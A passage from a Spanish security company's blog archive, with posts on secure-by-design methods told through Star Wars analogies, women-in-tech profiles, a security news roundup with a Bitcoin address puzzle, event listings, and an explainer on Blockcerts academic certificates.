Volvemos a conectar con la entrada anterior sobre diseño seguro donde en esencia vimos que la técnica de penetración-parcheado-corrección supone un coste mucho mayor que la integración de robustos mecanismos de seguridad que prevengan las vulnerabilidades en una fase temprana. Basta con recordar el ejemplo del gasto no previsto que tuvo que financiar el canciller Darth Sidious para reconstruir la Estrella de la Muerte. Y en la mayoría de los casos no hablamos solo de gasto económico, sino también perjuicio de imagen, consideraciones legales, cuestiones de privacidad, daños a terceros, que te lancen por un pozo de ventilación mientras lanzas rayos, etc. Veamos algunos métodos más para el desarrollo seguro, pero en este caso solo dos de los más importantes que afectan a cómo se desarrolla un software seguro y privado, con independencia del resto del ciclo de vida. Integración segura en fase de desarrollo Por muy expertos que sean los desarrolladores y muy tipificados que estén los requisitos funcionales y de seguridad durante la etapa de desarrollo, la integración de componentes de seguridad en sistemas complejos modularizados no es una tarea sencilla. Además, requiere de una formación adecuada y en constante renovación a la hora de implementar las peculiaridades funcionales de seguridad. Para resolver estas cuestiones numerosas propuestas ofrecen a los desarrolladores un apoyo, que lejos de ser invasivo, permiten incorporar a sus frameworks de trabajo elementos que proporcionen ese conocimiento de seguridad necesario que eviten la introducción de defectos en el código. Este método es menos formal que los que hemos visto hasta ahora y se compone de: Una gestión eficiente y autogestionada de los repositorios de software seguro, junto a... ...la utilización sostenible y supervisada de primitivas tanto de funciones criptográficas como protocolos. Gracias a la centralización de los componentes, funciones y librerías de seguridad utilizadas en la empresa, junto a un correcto conocimiento de las funciones criptográficas y protocolos, permitirán a los desarrolladores saber de antemano si un protocolo sufre de vulnerabilidades por overflow o si una función criptográfica de hasheo ha sido comprometida y se pueden provocar colisiones de forma intencionada. En Rogue One, Bodhi Rook consigue entrar en el planeta Scarif a través de la puerta del escudo, únicamente utilizando un código obsoleto de autenticación, alegando que les han desviado desde la estación Eadu. Este éxito en ingeniería social hubiese sido inútil si los desarrolladores hubiesen previsto las carencias del factor humano y hubiesen añadido controles de seguridad basados en otro tipo de parámetros, como identificadores y huellas biométricas de los ocupantes, verificación de la firma criptográfica que autoriza el desvío de la nave, privilegios concedidos a la nave para acceder al espacio protegido, etc. Los desarrolladores hubiesen recibido de antemano del patrón/modelo de seguridad, el conjunto de controles necesarios para implementar. Métodos formales Estos métodos se componen de una serie de técnicas y herramientas con base matemática utilizadas para la verificación del desarrollo y análisis de sistemas. Normalmente aplicables a distintas fases del ciclo de vida de la creación software, donde las más habituales y que más han asimilado el uso de métodos formales son: La especificación de requisitos funcionales e integración en la fase de diseño, y... ....en la validación y verificación en la fase de desarrollo. El objetivo de estos métodos persigue proporcionar mecanismos que pueden mejorar la corrección del sistema en desarrollo, en este caso comprobar que se consigue el mayor grado de seguridad y privacidad en el sistema. Los métodos formales permiten recoger requisitos y decisiones de diseño utilizando un lenguaje preciso y común tanto para expresar el qué se quiere obtener, qué tests debe superar y en qué restricciones debe padecer. Estas tres estipulaciones definidas en lenguaje matemático son universales y verificables de forma inequívoca. En esencia, l a especificación indica qué queremos y qué no queremos conseguir desde los requisitos, y esta expresión va redefiniéndose a través de las funciones y los componentes donde, una vez llegado a las decisiones de diseño, su forma está tan próxima a la programación que su conversión es casi inmediata. Una vez obtenida la especificación y realizada la implementación, llega el proceso de la verificación formal, para ello gracias a la expresión matemática es posible comprobar la correctitud del sistema implementado. Durante el desarrollo la especificación se verifica a partir de pre y post condiciones que se cumplen en el código desarrollado. Es decir, de cada sentencia, función, clase, método y librería, se deben cumplir todas las precondiciones y postcondiciones que garantizan que se están cumpliendo con los formalismos matemáticos especificados, garantizando que al menos matemáticamente el programa/sistema cumple con su propósito esperado. Esto incluye que se cumplan las restricciones de seguridad y privacidad que fueron incluidas como requisitos funcionales. El equipo de diseño de sistemas informáticos del Imperio Galáctico hubiera solventado algunos de los problemas de seguridad mediante una especificación matemática de ciertos requisitos: El factor humano (de nuevo) como eslabón más débil Hemos repasado y descrito varios enfoques usados en el ciclo de vida del desarrollo software seguro y privado. Y todos ellos defienden unos conceptos muy básicos como son: Reducir la superficie de exposición a los riesgos. Regular y establecer políticas de seguridad y privacidad que validen el ciclo de vida de desarrollo Automatizar la integración de los mecanismos de seguridad y Reducir el factor humano en la decisión de factores de seguridad a integrar/desplegar en el sistema. Una serie de factores proactivos y no reactivos. Es decir, más control del imperio galáctico utilizando droides y menos midiclorianos en sangre picando código. Fuente: Wiki Star Wars Y es que la práctica ha demostrado que las principales vulnerabilidades encontradas en los sistemas son introducidas por errores humanos, y que hubiesen sido fácilmente detectables de forma anticipada. Pero queda demostrado que todos los errores introducidos por factores humanos son los más complejos de resolver y corregir, ya que la mayoría se deben a malas prácticas, ignorancia y falta del seguimiento de procedimientos estandarizados. Anecdóticamente Darth Vader mataba a todos los que le fallaban, suponemos que también a los CISOs, por lo que es difícil que de los fallos que hubiesen cometidos pudiesen adquirir lecciones aprendidas para corregirlas en el futuro. En definitiva, cada vez más necesitamos acudir a enfoques y ciclos de desarrollo que integren SPD en su núcleo y que permitan gracias a su asistencia corregir todos los errores que por nuestra propia naturaleza humana pudiésemos introducir. La mejora y optimización de los procesos desatendidos y automatizados ayudan a prevenir fallos del diseño y a remediar con bastante antelación fallos de seguridad. Confiar en la Fuerza está bien, pero dejarse ayudar por R2-D2, K2SO o BB-8 garantizará que haremos la tarea con mayor seguridad y privacidad. Marcos Arjona Innovación y Laboratorio de ElevenPaths marcos.arjona@11paths.com
29 de enero de 2018
Historias de #MujeresHacker: María Domínguez, experta en servicios de ciberseguridad en Telefónica
Esta semana os traemos el relato de María Domínguez, Product Manager de Telefónica, experta en servicios de ciberseguridad. Ella, como muchos de nuestros referentes, no pensó que se dedicaría a la tecnología, pero encontró su camino con dedicación y ganas de intentarlo. María Domínguez, una de las #MujeresHacker de Telefónica nos cuenta su historia: Si tuviera que comenzar mi historia con un titular sería este: “La tecnología tiene muchas caras y nunca es tarde para encontrar la que te divierte”. Uno nunca sabe dónde va a acabar, pero mis comienzos no auguraban que acabaría dedicándome a la tecnología. Cuando era pequeña, todas mis referencias profesionales o más comúnmente el típico "¿qué vas a ser de mayor?" era pensar en el estándar asociado a las mujeres que me rodeaban: enfermera, profesora, peluquera, etc. Sumado a esto, no ayudaba que no tuviera una vocación clara. Cuando tuve que empezar a tomar decisiones que finalmente influirían en mi vida profesional, mi padre me decía que tenía que salir de la zona de confort y superarme, que el miedo a lo desconocido no me hacía ver que había más allá. Él siempre ha intentado que fuera consciente de las capacidades que tengo, que a veces uno mismo no ve, y que supiera que, con mi propio esfuerzo, podría superar ese miedo. Tengo mucha suerte porque en mis decisiones tanto académicas como profesionales, sobre todo si suponían un reto, mis padres me han animado a enfrentarme y a lanzarme a ello. Con su apoyo y mi inquietud por la tecnología, finalmente decidí estudiar una Ingeniería de Telecomunicación.. Mi etapa universitaria fue como la de cualquier ingeniero: descubrí que “Teleco” era una carrera muy dura, y fue una bofetada de realidad en muchos sentidos. Mi primer año de carrera fue difícil, pese a que siempre me han gustado las ciencias y se me daban bien en el colegio, cuando realizas una ingeniería tienes que reinventarte, para que no te frustre eso de no aprobar tan fácilmente, y a su vez, que eso no haga que pierdas el interés de seguir intentándolo. La verdad es que tuve suerte durante mi etapa en la Universidad ya que estudié en una escuela con profesores jóvenes, que habían pasado por lo mismo que yo hacía poco tiempo, y muchos de ellos acabaron siendo un referente para mí. Además de este gran apoyo, tener un grupo de amigos con los que poder llorar y reír cuando es necesario fue muy importante durante mis estudios. Una vez mi época universitaria acabó, comencé mi carrera profesional en Telefónica y durante estos años he tenido grandes referentes (compañeros, jefes, etc) que me enseñaron, me apoyaron, me exigieron, me dieron más responsabilidades, me dejaron que cometiera errores y que también dejaron que me pusiera alguna medalla. Eso fue fundamental para mí, porque realmente en esta etapa laboral ha sido cuando he encontrado una vocación, un camino que me gusta y he visto que todo el esfuerzo realizado durante mucho tiempo ha servido y ha tenido su recompensa. A día de hoy, pienso mucho en mi carrera y en lo que nos rodea. Nuestro mundo no para de cambiar y la tecnología contribuye a que vayamos avanzando como sociedad y como profesionales. Para mí un hacker es cualquier persona que aprovecha los recursos que tiene para crear algo diferente, nuevo y mejor. En mi caso y quizás por ser una mujer, los recursos y las referencias que tenía alrededor no eran los mejores para poder llegar a trabajar en tecnología, pero los aproveché y los convertí en lo que ahora soy profesionalmente. Por eso, el principal consejo que les daría a las jóvenes que quieren ser hacker es que aprovechen la oportunidad, que busquen referentes, y que busquen apoyo en sus personas más cercanas. Al dedicarme al mundo de la seguridad todavía veo mucha desigualdad de género y como feminista convencida, creo que es importante que tanto hombres como mujeres desde nuestra posición demos visibilidad a que el mundo tecnológico no entiende de sexos. Tengo una sobrina de 6 años a la que quiero inculcar que la tecnología es divertida y que animaré en el caso que quiera dedicarse a ello. Ella ya ve en el día a día que soy la "friki" de la familia que ayuda a todos con sus problemas tecnológicos. Deseo que vea que esto es algo bueno y que, si ella quiere, también pueda en un futuro dedicarse al mundo STEM. Si mi historia anima a alguna niña o mujer a continuar, a no rendirse, a buscar su camino para descubrir su motivación, habrá valido la pena, y le diría: La tecnología tiene muchos caminos y si realmente te gusta, seguro que encuentras el que más te divierta, te complete y te interese. María Dominguez Alvarez Cyber Security Product Manager Telefónica @MariaDguezAlvar Si también eres mujer y hacker cuéntanos tu historia en mujereshacker@telefonica.com o rellena el siguiente formulario para inspirar a las más jóvenes. Queremos dar cabida a todas esas historias inspiradoras, valientes y alentadoras que recibamos. Estate atento todos los viernes publicaremos un nuevo post de la serie #MujeresHacker: » Mamá, yo quiero ser hacker » Sheila Berta, la speaker más joven en DefCON & BlackHat » Laura Iglesias, experta en ciberseguridad y hacking en Telefónica » Paula López, Data Scientist en la 4ª Plataforma de Telefónica » Rosa María Castillo, experta en Investigación y Desarrollo en Telefónica » Ivonne Pedraza, experta en Seguridad de la Información de Telefónica » Marta Pérez, experta en User Research de Telefónica Aura » Elena Díaz, Data Scientist de Telefónica
26 de enero de 2018
#CyberSecurityPulse: Adivina, adivinanza... ¿Cómo se almacena información en una dirección de Bitcoin?
Tal y como hemos visto en post anteriores del blog de ElevenPaths, el campo OP_RETURN de una transacción de Bitcoin es utilizado para almacenar una pequeña porción de información (hasta 80 bytes). De él, se sirven numerosos proyectos para crear casos de uso vinculados a certificar que algo ha ocurrido como realiza el proyecto Proof of Existence, expedir y validar certificados académicos o incluso publicar las órdenes a ejecutar a los nodos infectados dentro de una botnet. Sin embargo, ¿conocías cuál era la técnica utilizada antes de 2013 para almacenar información en la cadena de bloques? En este sentido, se utilizaban (y aún se siguen utilizando) las direcciones de Bitcoin en sí mismas. Al final, una dirección no deja de ser una cadena de texto codificada en Base58Check que contiene unos datos útiles de hasta 20 bytes de longitud relativos al hash de la clave pública asociada a la dirección. Sabiendo esto, se enviaban pequeñas cantidades a estas direcciones generadas arbitrariamente, y por tanto, sin clave privada conocida. Esto tiene la consecuencia de que el saldo enviado a esas direcciones de las que no se dispone la clave privada no se va a poder gastar, pero al menos se garantizaba que las operaciones se almacenarán en la cadena de bloques. Sabiendo esto, os proponemos un reto. Id a la siguiente transacción y tratad de identificar la dirección que comienza por '15g'. Seguido, verificad si se trata de una dirección válida (¡debería serlo porque está en la blockchain de Bitcoin!) y luego intentad decodificarla de Base58 a hexadecimal. Y, por último, decodifícala de hexadecimal a caracteres ASCII. ¿Sabrías qué información se almacenó en esa transacción emitida hace ya cinco años? La forma de anclar información en una blockchain ha ido evolucionando con el paso del tiempo en función de las necesidades de los desarrolladores. Pero también aquí muchas veces el debate pasa de ser técnico a filosófico. Las nuevas funcionalidades también han generado mucho debate sobre el camino a seguir ya que la adopción de estas nuevas características tienen implicaciones que pueden cuestionar el sentido original de algunos proyectos. El consenso no siempre es posible. Noticias destacadas El presidente Trump firma el proyecto de ley de vigilancia global de Estados Unidos El presidente Trump ya ha firmado el marco jurídico estadounidense relacionado con la vigilancia nacional un día después de que el Senado lo aprobara con 65 votos contra 34. Defensores de la privacidad y derechos civiles criticaron duramente la Sección 702 de la Ley de Vigilancia de la Inteligencia Extranjera (FISA) que va a permitir a las agencias de inteligencia de Estados Unidos llevar a cabo la vigilancia doméstica bajo ciertas condiciones sin una orden judicial. La Sección 702 permite que la NSA realice dicha vigilancia sin una autorización a extranjeros ubicados en el extranjero, incluida cualquier comunicación con ciudadanos estadounidenses.. Más información en House.gov El Senado de Estados Unidos, en el punto de mira de Fancy Bear El grupo conocido como Fancy Bear ataca de nuevo, pero en esta ocasión al Senado estadounidense, según Trend Micro. A partir de junio de 2017, se crearon webs de phishing que imitaban el correo interno del Senado de EE. UU. Al observar el fingerprint de estos sitios de phishing y compararlos con un gran conjunto de datos que abarca casi cinco años, la empresa de seguridad han sido capaces de relacionarlos de manera única con un par de incidentes de este grupo en 2016 y 2017. La atribución es extremadamente complicada donde es muy habitual utilizar pistas falsas para engañar a sus adversarios. Sin embargo, Tend Micro, que ha seguido a Fancy Bear durante años, asegura no tener dudas respecto a la atribución de estos ataques. Más información en TrendMicro Noticias del resto de la semana Explotan tres vulnerabilidades de Microsoft Office para distribuir el malware Zyklon Investigadores de FireEye han detectado recientemente determinados threat actors que aprovechan vulnerabilidades relativamente nuevas de Microsoft Office para propagar el malware HTTP Zyklon. Zyklon se ha encontrado publicado desde principios de 2016 ofreciendo innumerables capacidades sofisticadas. Zyklon es un backdoor con capacidades de keylogging, capturar de contraseñas, descargar y ejecutar plugins adicionales, realizar ataques DDOS, autoactualizarse y autoeliminarse. Más información en FireEye Skype finalmente agrega el cifrado punto a punto para conversaciones privadas Conversaciones privadas será la nueva feature que está por introducirse en Skype aportando un cifrado de punto a punto para llamadas de audio, mensajes de texto y multimedia, como videos y archivos de audio. Las conversaciones privadas ya están disponibles para el programa Skype Insider, una plataforma que permite a los usuarios de Skype probar nuevas funcionalidades antes de que se extiendan al resto de sus aplicaciones y a sus más de 300 millones de usuarios en todo el mundo. Más información en Microsoft Triton Malware explota un 0-day en controladores Triconex SIS de Schneider En diciembre de 2017, investigadores de FireEye descubrieron un nuevo software malicioso denominado Triton. Schneider descubrió que el malware Triton explotaba un 0-day en el sistema instrumentado de seguridad Triconex (SIS). El análisis inicial llevado a cabo por Schneider excluyó que esta vulnerabilidad pudiera ser aprovechada, pero ahora el proveedor ha descubierto que el malware Triton aprovecha una fallo en versiones anteriores del sistema Tricon de Triconex. Más información en Security Affairs Otras noticias Casi la mitad de la población de Noruega expuesta en una filtración de sanidad Más información en The Hacker News Fallo en el cliente de BitTorrent permitiendo controlar su PC de forma remota Más información en Chromium Un hospital, víctima de una nueva campaña de ransomware SamSam, paga 55.000 dólares de rescate Más información en Security Affairs ¡Regístrate a la newsletter!
23 de enero de 2018
ElevenPaths participará, por segundo año consecutivo, en la Conference on Information Systems Security and Privacy (ICISSP)
La reciente investigación realizada desde el área de Innovación y Laboratorio de ElevenPaths, enfocada en el uso novedoso de técnicas inteligentes para la detección de malware en documentos PDF, ha sido aceptada para participar en la 4th International Conference on Information Systems Security and Privacy (ICISSP 18). La conferencia tendrá lugar este mes en Portugal, donde el equipo presentará los resultados. La International Conference on Information Systems Security and Privacy (ICISSP) es una conferencia anual, centrada en los aspectos relacionados con la seguridad y la privacidad de los sistemas de información, que intenta reunir los últimos resultados científicos de este campo a nivel global, buscando su agrupación y actuando de punto de encuentro tanto para investigadores como para profesionales del sector. La actual edición, que tendrá lugar en Madeira del 22 al 24 de enero, está patrocinada entre otros por EC-Council ( International Council of E-Commerce Consultants) y por el OMG ( Object Management Group). Las dos últimas elecciones (ICISSP 2016 y ICISSP 2017) fueron celebradas en Italia y Portugal respectivamente. ElevenPaths participó en esta última, con la presentación de técnicas propias para la aplicación de Machine Learning a la detección de malware. En la investigación que se presentará, se estudia concretamente la efectividad de las técnicas de inteligencia artificial en la detección de malware en documentos PDF, analizando las soluciones existentes y mostrando las capacidades del novedoso sistema desarrollado por ElevenPaths con alta aplicabilidad en el ámbito del C loud Computing. El resultado de la investigación que presentará el equipo, refuerza el sistema de análisis de documentos centrado en la detección de malware, preservando la privacidad del usuario que se presentó en la edición anterior. Este sistema ha sido ideado para integrarse con el resto de productos y servicios más representativos desarrollados por ElevenPaths, potenciándolos en materia de seguridad y con esta nueva mejora, abarcando la porción más significativa de documentos ofimáticos y potencialmente peligrosos, con los que los usuarios interaccionan día a día. La presentación tendrá lugar el 24 de enero, dentro de la sección Malware Detection y será publicada posteriormente en el proceedings de la conferencia. Innovación y laboratorio www.elevenpaths.com
22 de enero de 2018
Historias de #MujeresHacker: Elena Díaz, Data Scientist de Telefónica
Esta semana presentamos la historia de Elena Díaz que cómo Data Scientist en Telefónica hace del análisis de datos su gran pasión. Hoy nos cuenta sus motivaciones, consejos y experiencia en el sector STEM. Elena Díaz, una de las #MujeresHacker de Telefónica CDO nos cuenta su historia: Desde que era una niña sabía que seguiría el camino de las ciencias: me encantaba resolver problemas y las matemáticas era la asignatura que más me gustaba. Me encantaba todo ese mundo, mucho más que a los otros niños que compartían clase conmigo pero todavía no me había enamorado y no fue hasta la Universidad donde descubrí el mundo de la programación y acabé sabiendo a ciencia cierta (nunca mejor dicho) que lo mío era la programación. Empecé mi carrera estudiando una Licenciatura de Ciencias Matemáticas en la UCM, que más tarde complementé con el estudio del análisis de datos con un Máster en Data Mining en la Uned y un Máster en Analítica Web en IEBS. De mis años de Universidad recuerdo que los dos primeros años fueron especialmente duros, ya que estudiábamos asignaturas muy teóricas y abstractas y fue a partir del tercer año, con asignaturas prácticas, cuando descubrí que quería dedicarme a la programación, a las matemáticas y al análisis de datos. Una vez finalizada mi carrera, no paraba de hacerme la misma pregunta: ¿A qué me voy a dedicar? y era una pregunta que por el momento no tenía respuesta. Por eso, empecé haciendo cursos de programación en Java, que es a lo que se dedicaban la mayoría de mis compañeros de estudios, pero realmente hasta que no lo probé no supe que no es lo que más me gustaba. Decidí cambiar de registro y decantarme por la programación aplicada al análisis de datos y empecé a trabajar en una empresa de estudios de mercado, en el departamento de proceso de datos. Durante los primeros meses disfruté mucho aprendiendo nuevos lenguajes de programación, pero al poco me di cuenta de que era un trabajo muy repetitivo y monótono y supe que no me podía quedar allí mucho tiempo, por lo que decidí apostar por la consultoría analítica. A día de hoy, echo la vista atrás, y aunque haya estado en diferentes empresas del sector, sigo pensando que tengo un trabajo apasionante en el que nunca dejo de aprender, en cada proyecto aprendo nuevos lenguajes y nuevas técnicas orientadas a la explotación de los datos. Cada día hay una nueva herramienta que examinar o una nueva fuente de datos que analizar. Actualmente, trabajo c omo Data Science en LUCA, la unidad de datos de Telefónica, donde a menudo nos enfrentamos a retos nuevos y eso es lo que hace que siga disfrutando de mi trabajo día a día. Actualmente, el mundo de la tecnología ya no es sólo de hombres, cada vez somos más mujeres que además aportamos una visión diferente. Me considero una mujer hacker porque para mi un hacker es un apasionado de la tecnología, que disfruta investigando y aprendiendo cada día cosas nuevas. Es también alguien creativo, que no se da por vencido fácilmente. En mi caso, mi pasión son los datos y todas las herramientas y lenguajes de programación (o visualización ) que nos permiten analizar y generar insights de negocio que se materializan y ayudan a nuestros clientes. ¿Qué consejo le daría a las jóvenes que quieren dedicarse a la tecnología y convertirse en una hacker cómo yo? Principalmente les diría que si están interesadas en la tecnología y les apasiona, apuesten por ello. De cara a un futuro profesional, es muy importante descubrir que es lo que te gusta, y apostar por ello un 100% all in. Elena Díaz Data Scientist LUCA @ElenaDiazSanch1 Si también eres mujer y hacker cuéntanos tu historia en mujereshacker@telefonica.com o rellena el siguiente f ormulario para inspirar a las más jóvenes. Queremos dar cabida a todas esas historias inspiradoras, valientes y alentadoras que recibamos. Estate atento todos los viernes publicaremos un nuevo post de la serie #MujeresHacker: » Mamá, yo quiero ser hacker » Sheila Berta, la speaker más joven en DefCON & BlackHat » Laura Iglesias, experta en ciberseguridad y hacking en Telefónica » Paula López, Data Scientist en la 4ª Plataforma de Telefónica » Rosa María Castillo, experta en Investigación y Desarrollo en Telefónica » Ivonne Pedraza, experta en Seguridad de la Información de Telefónica
19 de enero de 2018
Eventos del mes de enero en los que participamos
¡Hola hackers! Un mes más os traemos los eventos en los que nuestros expertos, analistas y CSAs ( Chief Security Ambassadors) participan en enero. Saca tu agenda y toma nota de las fechas para que no se te escape ninguno. TIC Fórum Por séptimo año consesecutivo, Telefónica organiza TIC Fórum, un evento referencial para Empresas, Negocios y Organismos Gubernamentales. Se trata de un espacio donde se presentan las nuevas tecnologías y tendencias en telecomunicaciones. TIC Fórum México: el 18 de enero se celebra por primera vez en Ciudad de México. Nuestro CSA, Diego Espitia, participará en esta importante cita del sector como ponente para hablar sobre los 'ciberataques'. Accede al link del evento para registrarte. TIC Fórum El Salvador: Fabián Chiera, CSA de ElevenPaths Panamá, participará en el evento que tendrá lugar el 25 de enero con una charla titulada "Bitcoins, operando con seguridad". TIC Fórum Guatemala: el próximo 30 de enero, esta vez en Ciudad de Guatemala, Fabián Chiera participa con su ponencia sobre Bitcoins. CiberSeg18 Yaiza Rubio, analista de Inteligencia y una de nuestras #MujeresHacker, participa en estas jornadas sobre seguridad y ciberdefensa. Los próximos días 25 y 26 de enero podrás disfrutar de su ponencia sobre Blockchain y el gato de Schrödinger que tendrá lugar en la Universidad de Alcalá. La asistencia a este evento es totalmente gratuita, gracias a la participación desinteresada de ponentes, patrocinadores y colaboradores. SH3LLCON 2018 Los días 25, 26 y 27 se celebra el 4º Congreso de Seguridad de Cantabria en la ciudad de Santander, evento de referencia del sector seguridad. En esta edición, algunos de nuestros expertos participan como ponentes. El Chairman Chema Alonso, y los expertos Pablo González, Pablo San Emeterio y Álvaro Núñez-Romero Casado profundizarán en pentesting en sistemas Windows, talleres de Arducky y malwares. En nuestro post de febrero más información sobre los eventos en ciberseguridad. ¡Qué no se te escape ninguno!
18 de enero de 2018
¿Pugnan la academia y la empresa en la seguridad por diseño? (Una historia de Star Wars)
En un universo infinito, donde puede que exista una serie infinita de universos paralelos, que a su vez quizás existen dentro de un multiverso a su vez infinito, podemos afirmar que la probabilidad de que un desarrollo software que pasa al departamento de Q&A esté libre de vulnerabilidades es prácticamente cero. Y, por si fuera poco, la probabilidad de que esos universos estén masivamente poblados de usuarios maliciosos dispuestos a aprovechar esa vulnerabilidad es prácticamente del cien por cien. Que se lo pregunten a Galen Erso que tuvo que inventarse una historia apoteósica para que nadie se diese cuenta de su error de diseño. Aunque en la entrada anterior sobre la Seguridad y Privacidad por diseño (SPD) vimos el ciclo de vida del desarrollo software seguro y los objetivos perseguidos, la manera de abordar este proceso genera una infinidad de enfoques. La ingeniería de seguridad es un constante campo de batalla y las mayores diferencias podemos notarlas en la divergencia entre cómo aborda la SPD la empresa y cómo lo hace el sector académico. Dos grupos con ciertas diferencias pero que con esfuerzo pueden complementarse satisfactoriamente. Academia vs. empresa Ni los esfuerzos científicos desde la universidad están guiados por un consejo de sabios que se reúnen en cónclaves definiendo nuevos niveles de abstracción del diseño, ni en la empresa un directivo con traje arroja billetes a un servidor de red hasta que se securiza solo. Ojalá fuese así, ya que la divergencia Academia-Empresa sería fácilmente resoluble. Pero en la práctica, los enfoques de ambos mundos se han aproximado, han aprendido unos de otros y han logrado establecer unos procesos de ingeniería de seguridad adecuados, aunque aún queda un largo camino por recorrer. Que universidades y empresas tienen que trabajar conjuntamente no es nada nuevo, es un discurso repetido hasta la saciedad. Múltiples organismos internacionales ponen su máximo empeño en que exista una colaboración constante en el plano no solo de la investigación y la innovación, sino también en el desarrollo. Llegando a invertir grandes sumas para la realización de ambiciosos proyectos de investigación que tengan continuidad y sean convertidos en productos. Un flujo natural del plano científico de la academia, al comercial de la industria. Este impulso a nivel internacional, europeo y nacional supone un motor indudable del que han surgido tres tipos diferentes de resultados: Un reducido número de proyectos de indudable valor y calado. Una gran cantidad de proyectos lamentablemente invisibles, fracasados u olvidados. Una cantidad moderada de proyectos que quizás debieron ser detenidos en su momento, antes de otorgarles viabilidad comercial. Por tanto, en vez de trazar una línea divisoria inexpugnable, repasemos algunos de los enfoques más extendidos de la SPD que afectan a todo el ciclo de vida del desarrollo software ya que establecen las estrategias de diseño necesarios. Estos métodos que tanto Academia e Industria han interiorizado en mayor o menor medida facilitan el diseño y desarrollo de sistemas seguros. Diseño dirigido por Requisitos de Seguridad y Privacidad Este enfoque quizás sea el más intuitivo. Surge en tiempo de diseño cuando se recogen todos los requisitos funcionales y no funcionales del sistema, entre los que se encuentran los requisitos de seguridad y privacidad. Incluso en los primeros bocetos de los componentes que formarán parte del sistema, numerosas consideraciones deben ser tenidas en cuenta porque afectarán no solo al hardware y al software, sino también definirán qué aspectos preventivos o "remediativos" deben poseer el sistema. Además de verificar las posibles interdependencias y conflictos que los mecanismos de seguridad y privacidad incorporan al sistema. De esta fase de pre-diseño, cada vez más automatizada, se recolectan requisitos de seguridad de estándares como el Common Criteria. También se introducen aquellos derivados de taxonomías específicas de riesgos de seguridad y privacidad, como pueden ser las propuestas por el NIST. Además, incorporan los niveles de evaluación, como ITSEC, cuyo cumplimiento puede ser exigido desde esta fase inicial. En definitiva, el sistema no superará esta fase sin que todo el conjunto de requisitos de seguridad y privacidad hayan sido satisfechos. La fase de diseño puede continuar con la resolución funcional del problema, pero integrará de manera efectiva todos los elementos de diseño necesarios. Supongamos que estamos en la fase de diseño de la infraestructura de red de una gigantesca estación espacial flotante, como la Ciudad de las Nubes (Cloud City) en el Imperio Contraataca de Star Wars. Un requisito de seguridad podría perfectamente no dejar paneles y puertos de conexión desprotegidos, a la vista de cualquiera y sin control de acceso. Así es como R2-D2 pudo detener el proceso de compactación de basura. Pero un flagrante riesgo de seguridad y privacidad adicional, es que los archivos con información confidencial sobre las acciones del Imperio Galáctico fuesen accesibles desde el mismo segmento de red en el que estaba el compactador, y eso lo utilizase el androide para recuperarlos. Ambos requisitos eran conocidos con bastante antelación y por tanto debieron ser previstos en una fase bien temprana del diseño. Ingeniería de Seguridad basada en Modelos La búsqueda de procesos de diseño optimizados y automáticos derivó en la reutilización de arquitecturas y componentes que sistemáticamente reaprovechan estructuras y funcionalidades. Para ello la segregación y empaquetado de dichos componentes en modelos, se ha convertido en una práctica útil a la hora de resolver requisitos funcionales y no funcionales. Gracias a este enfoque, los subsistemas son mejorados, certificados y pueden ser validados con independencia al entorno o al dominio de uso, permitiendo la mejora continua de las partes aisladas y poseer un alto control sobre las dependencias e interfaces que se establecen con el resto del sistema. Este tipo de diseño modular ha permitido ofrecer soluciones muy variadas, desde utilizar el lenguaje de modelado UML, a otros más específicos como SysML o UMLSec donde gráficamente se traza el diseño del sistema. Estos enfoques pueden incluir desde modelos de vectores de ataque, hasta modelos de las circunstancias erróneas que el sistema debe evitar a toda costa. En otros casos, el enfoque establece un proceso de varias fases que parten de metamodelos que son instanciados con las características adecuadas al entorno donde será integrado. Por último, existe una completa vertiente en este enfoque que es el diseño mediante patrones de seguridad, que son artefactos que autocontienen los mecanismos para resolver requisitos o dotar al sistema de propiedades de seguridad y privacidad, además establecen los mecanismos para integrar en el ciclo de vida del desarrollo software. La Estrella de la Muerte disponía de suficientes turbo láseres, blásteres, cañones láser, iónicos y magnéticos en superficie como para detener cualquier ofensiva. Y su construcción fue optimizada gracias a modelos de diseño que fueron replicados con éxito por toda la esfera de la estación basados en predicciones de los vectores de ataque probables. Obviamente estos modelos no tuvieron en cuenta la movilidad y velocidad de acción necesaria en las defensas instaladas en la trinchera meridiana que conducía a los conductos de ventilación, no tuvieron en cuenta los requisitos diferenciales del entorno donde eran desplegados. El Imperio, que no reparaba en gastos, corrigió el diseño, mejorando los modelos, aunque esto supuso la introducción de otras vulnerabilidades del diseño que se incorporaron a la segunda Estrella de la Muerte. En la siguiente entrada de esta serie seguiremos repasando otros enfoques de diseño seguro, que demuestran los esfuerzos realizados para descubrir los mejores procedimientos a seguir para obtener software y sistemas más seguros y resilientes. Marcos Arjona Innovación y Laboratorio de ElevenPaths marcos.arjona@11paths.com
15 de enero de 2018
La expedición de certificados académicos: un caso de uso donde Blockchain sí tiene sentido
¿Eres Blockchain lover o definitivamente crees que aporta poco? Innumerables empresas tecnológicas están sacando al mercado proyectos alrededor de Blockchain, en ocasiones, explotando alguna de sus fortalezas y en otras no tanto. Lo que sí es cierto es que poco a poco van surgiendo proyectos de software libre con los que poder jugar y aprender de la tecnología. Uno con el que hemos estado trasteando recientemente ha sido BlockCerts, un estándar para crear, emitir, visualizar y verificar certificados utilizando la cadena de bloques de Bitcoin o de Ethereum. El objetivo de este proyecto es que ciertos organismos o individuos lleguen a ver útil dejar un registro de dicho certificado, firmado criptográficamente, para que luego pudiera ser validado por un tercero. Redefiniendo el sistema de certificados Imaginemos que ElevenPaths impartiera formación sobre seguridad y quisiéramos crear un certificado académico que fuera verificable por los departamentos de recursos humanos de diferentes empresas. Para ello nuestra empresa tendría que anclar en la cadena bloques un hash de cada certificado emitido para cada uno de los alumnos. La solución inmediata sería emitir una transacción que incluyera en el campo OP_RETURN la prueba de que eso ha ocurrido como hacen proyectos como Proof of Existence. Sin embargo, esta aproximación no es óptima y es costosa cuando existen muchos alumnos a certificar, teniendo en cuenta los elevados precios por transacción en Bitcoin o Ethereum. Para evitar este problema, Blockcerts utiliza una solución más eficiente apoyándose en los árboles de Merkle (Merkle trees, en inglés) usando únicamente una transacción para emitir un conjunto de certificados. Es decir, el emisor crea un árbol de Merkle y registra el hash de todos los certificados en el campo OP_RETURN en una misma transacción de Bitcoin. Estas estructuras tienen la particularidad que dado cualquiera de los fichero origen y la ruta hasta el "hash raíz" se puede verificar que ese fichero ha sido utilizado para generar el árbol. Figura 1. Estructura de un merkle tree para la verificación de un certificado (Fuente: blockcerts.org). ¿Qué partes tendría nuestro proyecto? Para ello, tendríamos que seguir el siguiente proceso del proyecto: Cert-tools. Con esta herramienta podríamos generar la entidad certificadora, la plantilla de los certificados que se expedirán a los alumnos y los certificados sin firmar para cada uno de los alumnos que han superado el curso. En un 